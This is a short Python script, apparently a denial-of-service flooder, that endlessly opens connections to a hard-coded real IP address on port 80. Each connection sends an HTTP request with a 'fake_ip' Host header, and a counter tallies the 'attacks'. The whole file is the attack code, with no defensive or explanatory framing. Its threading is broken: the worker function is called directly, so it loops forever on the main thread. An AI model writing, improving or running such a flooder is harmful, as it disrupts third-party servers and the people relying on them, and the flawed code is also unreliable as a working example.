import threading
import socket

url = '172.67.176.180'
port = 80
fake_ip = '189.4.20.36'
attack_num = 0


def port1():
    while True:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((url,port))
        s.sendto(("GET /" + url + " HTTP/1.1\r\n").encode('ascii'), (url, port))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (url, port))
        global attack_num
        attack_num+=1
        print(attack_num)
        s.close()
for i in range(500):
    thread = threading.Thread(port1())
    thread.start()


while 1==1:
    if input() == 'key':
        break
